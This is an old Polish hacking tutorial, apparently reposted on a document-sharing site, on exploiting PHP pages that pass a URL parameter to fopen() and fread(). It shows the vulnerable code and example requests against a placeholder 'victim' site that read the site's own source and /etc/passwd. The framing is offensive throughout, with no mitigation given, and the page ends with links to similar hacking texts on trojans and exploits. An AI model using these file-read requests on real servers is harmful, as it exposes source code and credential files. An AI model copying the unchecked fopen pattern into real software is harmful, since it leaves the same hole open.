Wykorzystanie błędów w fopen, DZIAŁ IT, Doc HACK


Wykorzystanie błędów w fopen()


W tym texcie opisze na czym polegają błędy w wykorzystaniu funkcji PHP jaką jest fopen() i fread()

Jeśli macie jakieś problemy to: michal@elektrobit.com.pl lub GG# 2222545

Zaprzaszam na strone www.deep-under.com ;) Greetz for speTZnut

---/ Przykład błedu /---

Dziurę taką poznajemy tak samo jak bug z include() czyli np.
http://www.ofiara.com/index.php?id=start.htm

Kod ktory otwiera daną strone z wykorzystaniem fopen() i fread() może wyglądać
np. tak:

<?
  if(!isset($id)) { $id='start.htm'; }
  if ($id=="") {$id='start.htm';}
  if (file_exists($id)){
  $file=fopen($id,'r');
  $dane=fread($file,filesize($id));
  echo($dane);} else { echo('Nie ma takiej strony');}
?>

Teraz małe wytłumaczenie. Funkcja isset() sprawdza czy zmienna podana w paramatrze
istnieje. Następnie jeśli nie istnieje zmiennej $id przypisujemy wartość "start.htm"
jeśli zaś istnieje otwieramy plik ktory jest w nij podany po uprzednim sprawdzeniu czy istnieniu (funkcja file_exists() ) a następnie odczytujemy z niego całą zawartość i wyświetlamy na stronie za pomocą echo()

Co dzięki temu możemy osiągnąć?? Między innymi przeglądać pliki na serwerze.
A teraz sposób jak to zrobić:

W oknie przglądarki wpisujemy
http://www.ofiara.com/index.php?id=index.php

Dzięki temu widzimy kod źródłowy pliku index.php
Możemy to także wykorzystać aby odczytać np. plik z hasłami

http://www.ofiara.com/index.php?id=/etc/passwd

Ale uwaga jeśli hasła są ukrywanie (shadow) w pliku /etc/shadow
to małe są szanse że go odczytamy. Dlaczego??

Ano dlatego że przeglądając w ten sposob pliki mamy uprawnienia takie na jakich jest uruchomiony serwer WWW.

Jak narazie to tyle jeśli ktoś ma ochote może dopisywać kolejne sposoby.

Jeśli coś nie działa piszcie na mail lub na gg ( podałem na górze textu )

[root@localhost]# whoiam
Vengeance
[root@localhost]#

Początek formularza

0x01 graphic
0x01 graphic
0x01 graphic
0x01 graphic

Dół formularza



Wyszukiwarka

Podobne podstrony:
Wykorzystanie błędów w include, DZIAŁ IT, Doc HACK
Wykorzystanie błędów w zapytaniach sql, DZIAŁ IT, Doc HACK
Typy ataków wykorzystywane na stronach WWW, DZIAŁ IT, Doc HACK
ie exploits volh, DZIAŁ IT, Doc HACK
Grub, DZIAŁ IT, Doc HACK
Wyszukiwanie informacji część 3, DZIAŁ IT, Doc HACK
Szperanie w sieciach lokalnych, DZIAŁ IT, Doc HACK
Kto to jest hacker, DZIAŁ IT, Doc HACK
Rozpoznanie wewnętrzne systemu, DZIAŁ IT, Doc HACK
haczenie kont, DZIAŁ IT, Doc HACK
TT czyli Trojans Teory, DZIAŁ IT, Doc HACK
falszywa wiadomosc, DZIAŁ IT, Doc HACK
Hacking 101, DZIAŁ IT, Doc HACK
Sniffery, DZIAŁ IT, Doc HACK
Techniki ataków robaków pocztowych1, DZIAŁ IT, Doc HACK
Trojan Lame Help Hand, DZIAŁ IT, Doc HACK
IE exploits vol, DZIAŁ IT, Doc HACK
e exploits vol, DZIAŁ IT, Doc HACK
Jak przemycić server, DZIAŁ IT, Doc HACK

więcej podobnych podstron